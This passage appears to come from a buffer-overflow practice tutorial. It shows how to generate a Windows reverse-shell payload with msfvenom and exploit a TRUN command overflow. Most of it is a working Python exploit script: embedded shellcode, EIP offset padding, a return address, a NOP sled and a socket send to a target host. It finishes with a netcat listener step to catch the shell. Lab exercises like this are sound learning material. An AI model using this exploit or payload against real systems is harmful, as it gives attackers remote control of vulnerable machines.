Generating Shellcode
PRACTICE ! PRACTICE ! PRACTICE !
Inorder to generate a shellcode, we are again going to use a metasploit powered tool called msfvenom
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.105 LPORT=1111 EXITFUNC=thread -f c -a x86 -b "\0x00" > payload
Let's flush this into our python script and exploit to get R00T :)
#!/usr/bin/python
import sys, socket
overflow = ("\xbf\xe1\xed\x78\xbb\xdd\xc2\xd9\x74\x24\xf4\x5d\x2b\xc9"
"\xb1\x52\x83\xed\xfc\x31\x7d\x0e\x03\x9c\xe3\x9a\x4e\xa2"
"\x14\xd8\xb1\x5a\xe5\xbd\x38\xbf\xd4\xfd\x5f\xb4\x47\xce"
"\x14\x98\x6b\xa5\x79\x08\xff\xcb\x55\x3f\x48\x61\x80\x0e"
"\x49\xda\xf0\x11\xc9\x21\x25\xf1\xf0\xe9\x38\xf0\x35\x17"
"\xb0\xa0\xee\x53\x67\x54\x9a\x2e\xb4\xdf\xd0\xbf\xbc\x3c"
"\xa0\xbe\xed\x93\xba\x98\x2d\x12\x6e\x91\x67\x0c\x73\x9c"
"\x3e\xa7\x47\x6a\xc1\x61\x96\x93\x6e\x4c\x16\x66\x6e\x89"
"\x91\x99\x05\xe3\xe1\x24\x1e\x30\x9b\xf2\xab\xa2\x3b\x70"
"\x0b\x0e\xbd\x55\xca\xc5\xb1\x12\x98\x81\xd5\xa5\x4d\xba"
"\xe2\x2e\x70\x6c\x63\x74\x57\xa8\x2f\x2e\xf6\xe9\x95\x81"
"\x07\xe9\x75\x7d\xa2\x62\x9b\x6a\xdf\x29\xf4\x5f\xd2\xd1"
"\x04\xc8\x65\xa2\x36\x57\xde\x2c\x7b\x10\xf8\xab\x7c\x0b"
"\xbc\x23\x83\xb4\xbd\x6a\x40\xe0\xed\x04\x61\x89\x65\xd4"
"\x8e\x5c\x29\x84\x20\x0f\x8a\x74\x81\xff\x62\x9e\x0e\xdf"
"\x93\xa1\xc4\x48\x39\x58\x8f\xb6\x16\x62\x26\x5f\x65\x62"
"\xb9\x24\xe0\x84\xd3\x4a\xa5\x1f\x4c\xf2\xec\xeb\xed\xfb"
"\x3a\x96\x2e\x77\xc9\x67\xe0\x70\xa4\x7b\x95\x70\xf3\x21"
"\x30\x8e\x29\x4d\xde\x1d\xb6\x8d\xa9\x3d\x61\xda\xfe\xf0"
"\x78\x8e\x12\xaa\xd2\xac\xee\x2a\x1c\x74\x35\x8f\xa3\x75"
"\xb8\xab\x87\x65\x04\x33\x8c\xd1\xd8\x62\x5a\x8f\x9e\xdc"
"\x2c\x79\x49\xb2\xe6\xed\x0c\xf8\x38\x6b\x11\xd5\xce\x93"
"\xa0\x80\x96\xac\x0d\x45\x1f\xd5\x73\xf5\xe0\x0c\x30\x15"
"\x03\x84\x4d\xbe\x9a\x4d\xec\xa3\x1c\xb8\x33\xda\x9e\x48"
"\xcc\x19\xbe\x39\xc9\x66\x78\xd2\xa3\xf7\xed\xd4\x10\xf7"
"\x27")
shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 32 + overflow
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.104',9999))
s.send(('TRUN /.:/' + shellcode))
s.close()
except:
print("Error !")
sys.exit()
2003 A's will lead us to the EIP and the next 4 bytes in the EIP is the pointer address of the essfunc.dll and then we add some NOP's (No Operations) these are basically just the padding and we are padding some space between the pointer address and our malicious shellcode so that no collisions occurs and then we add our malicious shellcode declared in a variable called overflow
Set up a netcat listener and run the python script to get R00T

Last updated